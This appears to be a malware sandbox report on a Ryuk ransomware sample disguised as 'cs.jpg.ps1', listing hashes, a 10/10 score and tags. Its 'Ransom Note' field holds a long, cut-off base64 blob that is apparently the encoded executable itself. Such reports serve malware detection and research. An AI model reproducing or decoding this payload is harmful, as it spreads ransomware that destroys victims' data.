ryuk | 3fd4cc4c6b673b37461086049a37d29fa05cd0b3773471ac087ea5eabdd57141

Analysis

max time kernel
153s
max time network
151s
platform
windows10_x64
resource
win10v20210408
submitted
08-09-2021 11:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cs.jpg.ps1
Size

5KB
MD5

51a645c8ec38c1c387184971fb25d415
SHA1

25454269f892c41c4402ad2a0f6a6550b6073710
SHA256

3fd4cc4c6b673b37461086049a37d29fa05cd0b3773471ac087ea5eabdd57141
SHA512

d819b5d5dff059406f223c27cdffbbaff2a11053ee1ab2dbc95d54dd9ee9ecfd7038209216506eeb765f9234ef56b792dc130ddd29402db4f24bea1add0be43f

Score

10^/10

ryuk persistence ransomware upx

Malware Config

Extracted

Path

C:\Users\Public\basemsf.txt

Family

ryuk

Ransom Note

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAD8pNTAuMW6k7jFupO4xbqTO9m0k6zFupOO47CTgMW6k3vK55O9xbqTuMW7k+PFupOO47GTvcW6k7jFupO5xbqTUNqxk7rFupNQ2r6TucW6k1JpY2i4xbqTAAAAAAAAAABQRQAATAEFAMFnBmEAAAAAAAAAAOAADiELAQYAAJAAAADQYgAAAAAAeVgAAAAQAAAAoAAAAAAAEAAQAAAAEAAABAAAAAAAAAAEAAAAAAAAAADAbgAAEAAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAABgrQAAQgAAAHSmAAA8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALBuAFwHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoAAAOAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAAhocAAAAQAAAAkAAAABAAAAAAAAAAAAAAAAAAACAAAGAucmRhdGEAAKINAAAAoAAAABAAAACgAAAAAAAAAAAAAAAAAABAAABALmRhdGEAAABAamIAALAAAABwYgAAsAAAAAAAAAAAAAAAAAAAQAAAwC52bXBzMAAAUIQLAAAgYwAAkAsAACBjAAAAAAAAAAAAAAAAAGAAAGAucmVsb2MAAFwHAAAAsG4AABAAAACwbgAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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A4PDBGaJB4PHAosDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEZokHg8cCiwODwwRmiQeDxwJbg8MEU4sbiwODwwRmiQeDxwKLA4PDBIgHR4sDg8MEiAdHiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwRmiQeDxwKLA4PDBGaJB4PHAosDg8MEZokHg8cCiwODwwRmiQeDxwKLA4PDBGaJB4PHAosDg8MEZokHg8cCiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEZokHg8cCiwODwwRmiQeDxwKLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwRTuRAAAACLG4HDCAAAAFNRixuLA4PDBIkHg8cEiwODwwSJB4PHBFlbg8MESQ+F3P///1uDwwRbg8MEM8D/FQCgABCQkDllwHQXaIgBAABoExUCBGgGAAAA6MYoAACDxAxQi128U4t9uIsDg8MEiQeDxwRXiz9TZosDg8MCiQeDxwRmiwODwwKJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBGaLA4PDAokHg8cEZosDg8MCiQeDxwRbgcMUAAAAX4PHBFeLP1NmiwODwwKJB4PHBIoDQ4kHg8cEigNDiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwRmiwODwwKJB4PHBGaLA4PDAokHg8cEZosDg8MCiQeDxwRmiwODwwKJB4PHBGaLA4PDAokHg8cEZosDg8MCiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEZosDg8MCiQeDxwRmiwODwwKJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBFeLP7kQAAAAgccIAAAAU1dRiz+LA4PDBIkHg8cEiwODwwSJB4PHBFlfW4PHBIHDCAAAAEkPhdT///9fg8cEW4HD4AAAAF+DxwTo4SYAAIPEBFiJRbSJZbD/dbT/dcSLRfhQaPgAAADoySYAAIPEBIv4W1CJXaiJRayLA4PDBIkHg8cEU4sbiwODwwRmiQeDxwKLA4PDBGaJB4PHAosDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEZokHg8cCiwODwwRmiQeDxwJbg8MEU4sbiwODwwRmiQeDxwKLA4PDBIgHR4sDg8MEiAdHiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwRmiQeDxwKLA4PDBGaJB4PHAosDg8MEZokHg8cCiwODwwRmiQeDxwKLA4PDBGaJB4PHAosDg8MEZokHg8cCiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEZokHg8cCiwODwwRmiQeDxwKLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwRTuRAAAACLG4HDCAAAAFNRixuLA4PDBIkHg8cEiwODwwSJB4PHBFlbg8MESQ+F3P///1uDwwRbg